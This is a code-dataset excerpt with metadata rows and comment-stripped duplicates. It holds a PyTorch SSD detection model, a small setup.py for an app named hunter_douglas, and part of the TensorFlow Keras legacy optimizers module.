conf.append(c(x).permute(0, 2, 3, 1).contiguous())
loc = torch.cat([o.view(o.size(0), -1) for o in loc], 1)
conf = torch.cat([o.view(o.size(0), -1) for o in conf], 1)
if self.phase == "test":
output = self.detect(
loc.view(loc.size(0), -1, 4), # loc preds
self.softmax(conf.view(conf.size(0), -1,
self.num_classes)), # conf preds
self.priors.type(type(x.data)) # default boxes
)
else:
output = (
loc.view(loc.size(0), -1, 4),
conf.view(conf.size(0), -1, self.num_classes),
self.priors
)
return output
def load_weights(self, base_file):
other, ext = os.path.splitext(base_file)
if ext in ('.pkl', '.pth'):
print('Loading weights into state dict...')
self.load_state_dict(torch.load(base_file,
map_location=lambda storage, loc: storage))
print('Finished!')
else:
print('Sorry only .pth and .pkl files supported.')
# This function is derived from torchvision VGG make_layers()
# https://github.com/pytorch/vision/blob/master/torchvision/models/vgg.py
def vgg(cfg, i, batch_norm=False):
layers = []
in_channels = i
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
elif v == 'C':
layers += [nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
pool5 = nn.MaxPool2d(kernel_size=3, stride=1, padding=1)
conv6 = nn.Conv2d(512, 1024, kernel_size=3, padding=6, dilation=6)
conv7 = nn.Conv2d(1024, 1024, kernel_size=1)
layers += [pool5, conv6,
nn.ReLU(inplace=True), conv7, nn.ReLU(inplace=True)]
return layers
def add_extras(cfg, i, batch_norm=False):
# Extra layers added to VGG for feature scaling
layers = []
in_channels = i
flag = False
for k, v in enumerate(cfg):
if in_channels != 'S':
if v == 'S':
layers += [nn.Conv2d(in_channels, cfg[k + 1],
kernel_size=(1, 3)[flag], stride=2, padding=1)]
else:
layers += [nn.Conv2d(in_channels, v, kernel_size=(1, 3)[flag])]
flag = not flag
in_channels = v
return layers
def multibox(vgg, extra_layers, cfg, num_classes):
loc_layers = []
conf_layers = []
vgg_source = [21, -2]
for k, v in enumerate(vgg_source):
loc_layers += [nn.Conv2d(vgg[v].out_channels,
cfg[k] * 4, kernel_size=3, padding=1)]
conf_layers += [nn.Conv2d(vgg[v].out_channels,
cfg[k] * num_classes, kernel_size=3, padding=1)]
for k, v in enumerate(extra_layers[1::2], 2):
loc_layers += [nn.Conv2d(v.out_channels, cfg[k]
* 4, kernel_size=3, padding=1)]
conf_layers += [nn.Conv2d(v.out_channels, cfg[k]
* num_classes, kernel_size=3, padding=1)]
return vgg, extra_layers, (loc_layers, conf_layers)
base = {
'300': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'C', 512, 512, 512, 'M',
512, 512, 512],
'512': [],
}
extras = {
'300': [256, 'S', 512, 128, 'S', 256, 128, 256, 128, 256],
'512': [],
}
mbox = {
'300': [4, 6, 6, 6, 4, 4], # number of boxes per feature map location
'512': [],
}
def build_ssd(phase, size=300, num_classes=21):
if phase != "test" and phase != "train":
print("ERROR: Phase: " + phase + " not recognized")
return
if size != 300:
print("ERROR: You specified size " + repr(size) + ". However, " +
"currently only SSD300 (size=300) is supported!")
return
base_, extras_, head_ = multibox(vgg(base[str(size)], 3),
add_extras(extras[str(size)], 1024),
mbox[str(size)], num_classes)
return SSD(phase, size, base_, extras_, head_, num_classes)
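# A minimal construction sketch, not part of the original file; the tensor size
# below is only illustrative of the expected 300x300 input.
def _example_build_ssd():
    net = build_ssd("train", size=300, num_classes=21)
    loc, conf, priors = net(torch.randn(1, 3, 300, 300))  # train phase returns a tuple
    return loc.shape, conf.shape, priors.shape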
| 36.342857
| 79
| 0.550183
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from layers import *
from data import voc, coco
import os
class SSD(nn.Module):
def __init__(self, phase, size, base, extras, head, num_classes):
super(SSD, self).__init__()
self.phase = phase
self.num_classes = num_classes
self.cfg = (coco, voc)[num_classes == 21]
self.priorbox = PriorBox(self.cfg)
self.priors = self.priorbox.forward()
self.size = size
self.vgg = nn.ModuleList(base)
self.L2Norm = L2Norm(512, 20)
self.extras = nn.ModuleList(extras)
self.loc = nn.ModuleList(head[0])
self.conf = nn.ModuleList(head[1])
if phase == 'test':
self.softmax = nn.Softmax(dim=-1)
self.detect = Detect(num_classes, 0, 200, 0.01, 0.45)
def forward(self, x):
sources = list()
loc = list()
conf = list()
for k in range(23):
x = self.vgg[k](x)
s = self.L2Norm(x)
sources.append(s)
for k in range(23, len(self.vgg)):
x = self.vgg[k](x)
sources.append(x)
for k, v in enumerate(self.extras):
x = F.relu(v(x), inplace=True)
if k % 2 == 1:
sources.append(x)
for (x, l, c) in zip(sources, self.loc, self.conf):
loc.append(l(x).permute(0, 2, 3, 1).contiguous())
conf.append(c(x).permute(0, 2, 3, 1).contiguous())
loc = torch.cat([o.view(o.size(0), -1) for o in loc], 1)
conf = torch.cat([o.view(o.size(0), -1) for o in conf], 1)
if self.phase == "test":
output = self.detect(
loc.view(loc.size(0), -1, 4),
self.softmax(conf.view(conf.size(0), -1,
self.num_classes)),
self.priors.type(type(x.data))
)
else:
output = (
loc.view(loc.size(0), -1, 4),
conf.view(conf.size(0), -1, self.num_classes),
self.priors
)
return output
def load_weights(self, base_file):
other, ext = os.path.splitext(base_file)
        if ext == '.pkl' or ext == '.pth':
print('Loading weights into state dict...')
self.load_state_dict(torch.load(base_file,
map_location=lambda storage, loc: storage))
print('Finished!')
else:
print('Sorry only .pth and .pkl files supported.')
def vgg(cfg, i, batch_norm=False):
layers = []
in_channels = i
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
elif v == 'C':
layers += [nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
pool5 = nn.MaxPool2d(kernel_size=3, stride=1, padding=1)
conv6 = nn.Conv2d(512, 1024, kernel_size=3, padding=6, dilation=6)
conv7 = nn.Conv2d(1024, 1024, kernel_size=1)
layers += [pool5, conv6,
nn.ReLU(inplace=True), conv7, nn.ReLU(inplace=True)]
return layers
def add_extras(cfg, i, batch_norm=False):
layers = []
in_channels = i
flag = False
for k, v in enumerate(cfg):
if in_channels != 'S':
if v == 'S':
layers += [nn.Conv2d(in_channels, cfg[k + 1],
kernel_size=(1, 3)[flag], stride=2, padding=1)]
else:
layers += [nn.Conv2d(in_channels, v, kernel_size=(1, 3)[flag])]
flag = not flag
in_channels = v
return layers
def multibox(vgg, extra_layers, cfg, num_classes):
loc_layers = []
conf_layers = []
vgg_source = [21, -2]
for k, v in enumerate(vgg_source):
loc_layers += [nn.Conv2d(vgg[v].out_channels,
cfg[k] * 4, kernel_size=3, padding=1)]
conf_layers += [nn.Conv2d(vgg[v].out_channels,
cfg[k] * num_classes, kernel_size=3, padding=1)]
for k, v in enumerate(extra_layers[1::2], 2):
loc_layers += [nn.Conv2d(v.out_channels, cfg[k]
* 4, kernel_size=3, padding=1)]
conf_layers += [nn.Conv2d(v.out_channels, cfg[k]
* num_classes, kernel_size=3, padding=1)]
return vgg, extra_layers, (loc_layers, conf_layers)
base = {
'300': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'C', 512, 512, 512, 'M',
512, 512, 512],
'512': [],
}
extras = {
'300': [256, 'S', 512, 128, 'S', 256, 128, 256, 128, 256],
'512': [],
}
mbox = {
'300': [4, 6, 6, 6, 4, 4],
'512': [],
}
def build_ssd(phase, size=300, num_classes=21):
if phase != "test" and phase != "train":
print("ERROR: Phase: " + phase + " not recognized")
return
if size != 300:
print("ERROR: You specified size " + repr(size) + ". However, " +
"currently only SSD300 (size=300) is supported!")
return
base_, extras_, head_ = multibox(vgg(base[str(size)], 3),
add_extras(extras[str(size)], 1024),
mbox[str(size)], num_classes)
return SSD(phase, size, base_, extras_, head_, num_classes)
| true
| true
|
1c3ead8902dc5079ac08b7790e806050bc90ad77
| 702
|
py
|
Python
|
setup.py
|
thispl/hunter_douglas
|
40ac85e9fba607ec8a9aa6a472b486f8b24f8600
|
[
"MIT"
] | null | null | null |
setup.py
|
thispl/hunter_douglas
|
40ac85e9fba607ec8a9aa6a472b486f8b24f8600
|
[
"MIT"
] | null | null | null |
setup.py
|
thispl/hunter_douglas
|
40ac85e9fba607ec8a9aa6a472b486f8b24f8600
|
[
"MIT"
] | 1
|
2019-12-31T06:52:12.000Z
|
2019-12-31T06:52:12.000Z
|
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
import re, ast
with open('requirements.txt') as f:
install_requires = f.read().strip().split('\n')
# get version from __version__ variable in hunter_douglas/__init__.py
_version_re = re.compile(r'__version__\s+=\s+(.*)')
with open('hunter_douglas/__init__.py', 'rb') as f:
version = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
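# Illustrative note (not part of the original setup.py): the pattern above
# matches a line such as "__version__ = '0.0.1'"; group(1) captures the quoted
# literal "'0.0.1'" and ast.literal_eval turns it into the plain string
# '0.0.1', which is what gets passed to setup() below.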
setup(
name='hunter_douglas',
version=version,
description='Custom App for Hunter Douglas',
author='VHRS',
author_email='abdulla.pi@voltechgroup.com',
packages=find_packages(),
zip_safe=False,
include_package_data=True,
install_requires=install_requires
)
| 27
| 69
| 0.739316
|
from setuptools import setup, find_packages
import re, ast
with open('requirements.txt') as f:
install_requires = f.read().strip().split('\n')
_version_re = re.compile(r'__version__\s+=\s+(.*)')
with open('hunter_douglas/__init__.py', 'rb') as f:
version = str(ast.literal_eval(_version_re.search(
f.read().decode('utf-8')).group(1)))
setup(
name='hunter_douglas',
version=version,
description='Custom App for Hunter Douglas',
author='VHRS',
author_email='abdulla.pi@voltechgroup.com',
packages=find_packages(),
zip_safe=False,
include_package_data=True,
install_requires=install_requires
)
| true
| true
|
1c3eae2cb9449c33d73e5d650ec292109dd9831e
| 30,227
|
py
|
Python
|
tensorflow/python/keras/optimizers.py
|
lambdabaa/tensorflow
|
b7e7addbd06c3ba414565f1cd50d734a45f6e12d
|
[
"Apache-2.0"
] | 26
|
2019-11-10T15:33:34.000Z
|
2022-03-24T19:56:57.000Z
|
tensorflow/python/keras/optimizers.py
|
lambdabaa/tensorflow
|
b7e7addbd06c3ba414565f1cd50d734a45f6e12d
|
[
"Apache-2.0"
] | 1
|
2019-08-15T02:49:21.000Z
|
2019-09-04T10:10:59.000Z
|
tensorflow/python/keras/optimizers.py
|
lambdabaa/tensorflow
|
b7e7addbd06c3ba414565f1cd50d734a45f6e12d
|
[
"Apache-2.0"
] | 6
|
2020-03-29T11:10:53.000Z
|
2021-06-14T05:39:14.000Z
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Built-in optimizer classes."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from six.moves import zip # pylint: disable=redefined-builtin
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.framework import ops
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.optimizer_v2 import adadelta as adadelta_v2
from tensorflow.python.keras.optimizer_v2 import adagrad as adagrad_v2
from tensorflow.python.keras.optimizer_v2 import adam as adam_v2
from tensorflow.python.keras.optimizer_v2 import adamax as adamax_v2
from tensorflow.python.keras.optimizer_v2 import ftrl
from tensorflow.python.keras.optimizer_v2 import gradient_descent as gradient_descent_v2
from tensorflow.python.keras.optimizer_v2 import nadam as nadam_v2
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.keras.optimizer_v2 import rmsprop as rmsprop_v2
from tensorflow.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.keras.utils.generic_utils import serialize_keras_object
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.training import optimizer as tf_optimizer_module
from tensorflow.python.training import training_util
from tensorflow.python.training.tracking import base as trackable
from tensorflow.python.util.tf_export import keras_export
class Optimizer(object):
"""Abstract optimizer base class.
Note: this is the parent class of all optimizers, not an actual optimizer
that can be used for training models.
All Keras optimizers support the following keyword arguments:
clipnorm: float >= 0. Gradients will be clipped
when their L2 norm exceeds this value.
clipvalue: float >= 0. Gradients will be clipped
when their absolute value exceeds this value.
"""
def __init__(self, **kwargs):
allowed_kwargs = {'clipnorm', 'clipvalue'}
for k in kwargs:
if k not in allowed_kwargs:
raise TypeError('Unexpected keyword argument '
'passed to optimizer: ' + str(k))
# checks that clipnorm >= 0 and clipvalue >= 0
if kwargs[k] < 0:
raise ValueError('Expected {} >= 0, received: {}'.format(k, kwargs[k]))
self.__dict__.update(kwargs)
self.updates = []
self.weights = []
def get_updates(self, loss, params):
raise NotImplementedError
def get_gradients(self, loss, params):
"""Returns gradients of `loss` with respect to `params`.
Arguments:
loss: Loss tensor.
params: List of variables.
Returns:
List of gradient tensors.
Raises:
ValueError: In case any gradient cannot be computed (e.g. if gradient
function not implemented).
"""
grads = K.gradients(loss, params)
if None in grads:
raise ValueError('An operation has `None` for gradient. '
'Please make sure that all of your ops have a '
'gradient defined (i.e. are differentiable). '
'Common ops without gradient: '
'K.argmax, K.round, K.eval.')
if hasattr(self, 'clipnorm'):
grads = [clip_ops.clip_by_norm(g, self.clipnorm) for g in grads]
if hasattr(self, 'clipvalue'):
grads = [
clip_ops.clip_by_value(g, -self.clipvalue, self.clipvalue)
for g in grads
]
return grads
def set_weights(self, weights):
"""Sets the weights of the optimizer, from Numpy arrays.
Should only be called after computing the gradients
(otherwise the optimizer has no weights).
Arguments:
weights: a list of Numpy arrays. The number of arrays and their shape
must match number of the dimensions of the weights of the optimizer
(i.e. it should match the output of `get_weights`).
Raises:
ValueError: in case of incompatible weight shapes.
"""
params = self.weights
if len(params) != len(weights):
raise ValueError('Length of the specified weight list (' +
str(len(weights)) +
') does not match the number of weights '
'of the optimizer (' + str(len(params)) + ')')
weight_value_tuples = []
param_values = K.batch_get_value(params)
for pv, p, w in zip(param_values, params, weights):
if pv.shape != w.shape:
raise ValueError('Optimizer weight shape ' + str(pv.shape) +
' not compatible with '
'provided weight shape ' + str(w.shape))
weight_value_tuples.append((p, w))
K.batch_set_value(weight_value_tuples)
def get_weights(self):
"""Returns the current value of the weights of the optimizer.
Returns:
A list of numpy arrays.
"""
return K.batch_get_value(self.weights)
def get_config(self):
config = {}
if hasattr(self, 'clipnorm'):
config['clipnorm'] = self.clipnorm
if hasattr(self, 'clipvalue'):
config['clipvalue'] = self.clipvalue
return config
@classmethod
def from_config(cls, config):
return cls(**config)
class SGD(Optimizer):
"""Stochastic gradient descent optimizer.
Includes support for momentum,
learning rate decay, and Nesterov momentum.
Arguments:
lr: float >= 0. Learning rate.
momentum: float >= 0. Parameter that accelerates SGD in the relevant
direction and dampens oscillations.
decay: float >= 0. Learning rate decay over each update.
nesterov: boolean. Whether to apply Nesterov momentum.
"""
def __init__(self, lr=0.01, momentum=0., decay=0., nesterov=False, **kwargs):
super(SGD, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.lr = K.variable(lr, name='lr')
self.momentum = K.variable(momentum, name='momentum')
self.decay = K.variable(decay, name='decay')
self.initial_decay = decay
self.nesterov = nesterov
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
# momentum
shapes = [K.int_shape(p) for p in params]
moments = [K.zeros(shape) for shape in shapes]
self.weights = [self.iterations] + moments
for p, g, m in zip(params, grads, moments):
v = self.momentum * m - lr * g # velocity
self.updates.append(state_ops.assign(m, v))
if self.nesterov:
new_p = p + self.momentum * v - lr * g
else:
new_p = p + v
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'momentum': float(K.get_value(self.momentum)),
'decay': float(K.get_value(self.decay)),
'nesterov': self.nesterov
}
base_config = super(SGD, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
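# Worked example (added for illustration; not part of the upstream module):
# with lr=0.1, decay=0.01 and iterations=100, the effective rate computed in
# SGD.get_updates above is
#     lr_t = 0.1 * 1. / (1. + 0.01 * 100) = 0.05
# Each parameter then moves by v = momentum * m - lr_t * g; when
# nesterov=True the applied update is momentum * v - lr_t * g instead of v.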
class RMSprop(Optimizer):
"""RMSProp optimizer.
It is recommended to leave the parameters of this optimizer
at their default values
(except the learning rate, which can be freely tuned).
Arguments:
lr: float >= 0. Learning rate.
rho: float >= 0.
epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
decay: float >= 0. Learning rate decay over each update.
"""
def __init__(self, lr=0.001, rho=0.9, epsilon=None, decay=0., **kwargs):
super(RMSprop, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.lr = K.variable(lr, name='lr')
self.rho = K.variable(rho, name='rho')
self.decay = K.variable(decay, name='decay')
self.iterations = K.variable(0, dtype='int64', name='iterations')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
accumulators = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
self.weights = accumulators
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
for p, g, a in zip(params, grads, accumulators):
# update accumulator
new_a = self.rho * a + (1. - self.rho) * math_ops.square(g)
self.updates.append(state_ops.assign(a, new_a))
new_p = p - lr * g / (K.sqrt(new_a) + self.epsilon)
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'rho': float(K.get_value(self.rho)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(RMSprop, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adagrad(Optimizer):
"""Adagrad optimizer.
Adagrad is an optimizer with parameter-specific learning rates,
which are adapted relative to how frequently a parameter gets
updated during training. The more updates a parameter receives,
the smaller the updates.
It is recommended to leave the parameters of this optimizer
at their default values.
# Arguments
lr: float >= 0. Initial learning rate.
epsilon: float >= 0. If `None`, defaults to `K.epsilon()`.
decay: float >= 0. Learning rate decay over each update.
# References
- [Adaptive Subgradient Methods for Online Learning and Stochastic
Optimization](http://www.jmlr.org/papers/volume12/duchi11a/duchi11a.pdf)
"""
def __init__(self, lr=0.01, epsilon=None, decay=0., **kwargs):
super(Adagrad, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.lr = K.variable(lr, name='lr')
self.decay = K.variable(decay, name='decay')
self.iterations = K.variable(0, dtype='int64', name='iterations')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
shapes = [K.int_shape(p) for p in params]
accumulators = [K.zeros(shape) for shape in shapes]
self.weights = accumulators
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
for p, g, a in zip(params, grads, accumulators):
new_a = a + math_ops.square(g) # update accumulator
self.updates.append(state_ops.assign(a, new_a))
new_p = p - lr * g / (K.sqrt(new_a) + self.epsilon)
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(Adagrad, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adadelta(Optimizer):
"""Adadelta optimizer.
Adadelta is a more robust extension of Adagrad
that adapts learning rates based on a moving window of gradient updates,
instead of accumulating all past gradients. This way, Adadelta continues
learning even when many updates have been done. Compared to Adagrad, in the
original version of Adadelta you don't have to set an initial learning
rate. In this version, initial learning rate and decay factor can
be set, as in most other Keras optimizers.
It is recommended to leave the parameters of this optimizer
at their default values.
# Arguments
lr: float >= 0. Initial learning rate, defaults to 1.
It is recommended to leave it at the default value.
rho: float >= 0. Adadelta decay factor, corresponding to fraction of
gradient to keep at each time step.
epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
decay: float >= 0. Initial learning rate decay.
# References
- [Adadelta - an adaptive learning rate
method](http://arxiv.org/abs/1212.5701)
"""
def __init__(self, lr=1.0, rho=0.95, epsilon=None, decay=0., **kwargs):
super(Adadelta, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.lr = K.variable(lr, name='lr')
self.decay = K.variable(decay, name='decay')
self.iterations = K.variable(0, dtype='int64', name='iterations')
if epsilon is None:
epsilon = K.epsilon()
self.rho = rho
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
shapes = [K.int_shape(p) for p in params]
accumulators = [K.zeros(shape) for shape in shapes]
delta_accumulators = [K.zeros(shape) for shape in shapes]
self.weights = accumulators + delta_accumulators
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
for p, g, a, d_a in zip(params, grads, accumulators, delta_accumulators):
# update accumulator
new_a = self.rho * a + (1. - self.rho) * math_ops.square(g)
self.updates.append(state_ops.assign(a, new_a))
# use the new accumulator and the *old* delta_accumulator
update = g * K.sqrt(d_a + self.epsilon) / K.sqrt(new_a + self.epsilon)
new_p = p - lr * update
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
# update delta_accumulator
new_d_a = self.rho * d_a + (1 - self.rho) * math_ops.square(update)
self.updates.append(state_ops.assign(d_a, new_d_a))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'rho': self.rho,
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(Adadelta, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adam(Optimizer):
"""Adam optimizer.
Default parameters follow those provided in the original paper.
Arguments:
lr: float >= 0. Learning rate.
beta_1: float, 0 < beta < 1. Generally close to 1.
beta_2: float, 0 < beta < 1. Generally close to 1.
epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
decay: float >= 0. Learning rate decay over each update.
amsgrad: boolean. Whether to apply the AMSGrad variant of this algorithm
from the paper "On the Convergence of Adam and Beyond".
"""
def __init__(self,
lr=0.001,
beta_1=0.9,
beta_2=0.999,
epsilon=None,
decay=0.,
amsgrad=False,
**kwargs):
super(Adam, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.lr = K.variable(lr, name='lr')
self.beta_1 = K.variable(beta_1, name='beta_1')
self.beta_2 = K.variable(beta_2, name='beta_2')
self.decay = K.variable(decay, name='decay')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
self.amsgrad = amsgrad
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = []
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
t = math_ops.cast(self.iterations, K.floatx())
lr_t = lr * (
K.sqrt(1. - math_ops.pow(self.beta_2, t)) /
(1. - math_ops.pow(self.beta_1, t)))
ms = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
vs = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
if self.amsgrad:
vhats = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
else:
vhats = [K.zeros(1) for _ in params]
self.weights = [self.iterations] + ms + vs + vhats
for p, g, m, v, vhat in zip(params, grads, ms, vs, vhats):
m_t = (self.beta_1 * m) + (1. - self.beta_1) * g
v_t = (self.beta_2 * v) + (1. - self.beta_2) * math_ops.square(g)
if self.amsgrad:
vhat_t = math_ops.maximum(vhat, v_t)
p_t = p - lr_t * m_t / (K.sqrt(vhat_t) + self.epsilon)
self.updates.append(state_ops.assign(vhat, vhat_t))
else:
p_t = p - lr_t * m_t / (K.sqrt(v_t) + self.epsilon)
self.updates.append(state_ops.assign(m, m_t))
self.updates.append(state_ops.assign(v, v_t))
new_p = p_t
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'beta_1': float(K.get_value(self.beta_1)),
'beta_2': float(K.get_value(self.beta_2)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon,
'amsgrad': self.amsgrad
}
base_config = super(Adam, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
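# Worked example (added for illustration; not part of the upstream module):
# at step t=1 with the default beta_1=0.9 and beta_2=0.999, the bias-corrected
# rate computed in Adam.get_updates above is
#     lr_t = lr * sqrt(1 - 0.999**1) / (1 - 0.9**1) = lr * sqrt(0.001) / 0.1
#          ~= 0.316 * lr
# which compensates for the zero-initialised first and second moments early on.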
class Adamax(Optimizer):
"""Adamax optimizer from Adam paper's Section 7.
It is a variant of Adam based on the infinity norm.
Default parameters follow those provided in the paper.
Arguments:
lr: float >= 0. Learning rate.
beta_1/beta_2: floats, 0 < beta < 1. Generally close to 1.
epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
decay: float >= 0. Learning rate decay over each update.
"""
def __init__(self,
lr=0.002,
beta_1=0.9,
beta_2=0.999,
epsilon=None,
decay=0.,
**kwargs):
super(Adamax, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.lr = K.variable(lr, name='lr')
self.beta_1 = K.variable(beta_1, name='beta_1')
self.beta_2 = K.variable(beta_2, name='beta_2')
self.decay = K.variable(decay, name='decay')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = []
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. /
(1. +
self.decay * math_ops.cast(self.iterations, K.dtype(self.decay))))
with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
t = math_ops.cast(self.iterations, K.floatx())
lr_t = lr / (1. - math_ops.pow(self.beta_1, t))
shapes = [K.int_shape(p) for p in params]
# zero init of 1st moment
ms = [K.zeros(shape) for shape in shapes]
# zero init of exponentially weighted infinity norm
us = [K.zeros(shape) for shape in shapes]
self.weights = [self.iterations] + ms + us
for p, g, m, u in zip(params, grads, ms, us):
m_t = (self.beta_1 * m) + (1. - self.beta_1) * g
u_t = math_ops.maximum(self.beta_2 * u, math_ops.abs(g))
p_t = p - lr_t * m_t / (u_t + self.epsilon)
self.updates.append(state_ops.assign(m, m_t))
self.updates.append(state_ops.assign(u, u_t))
new_p = p_t
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'beta_1': float(K.get_value(self.beta_1)),
'beta_2': float(K.get_value(self.beta_2)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(Adamax, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Nadam(Optimizer):
"""Nesterov Adam optimizer.
Much like Adam is essentially RMSprop with momentum,
  Nadam is Adam with Nesterov momentum.
Default parameters follow those provided in the paper.
It is recommended to leave the parameters of this optimizer
at their default values.
Arguments:
lr: float >= 0. Learning rate.
beta_1/beta_2: floats, 0 < beta < 1. Generally close to 1.
epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
"""
def __init__(self,
lr=0.002,
beta_1=0.9,
beta_2=0.999,
epsilon=None,
schedule_decay=0.004,
**kwargs):
super(Nadam, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.m_schedule = K.variable(1., name='m_schedule')
self.lr = K.variable(lr, name='lr')
self.beta_1 = K.variable(beta_1, name='beta_1')
self.beta_2 = K.variable(beta_2, name='beta_2')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
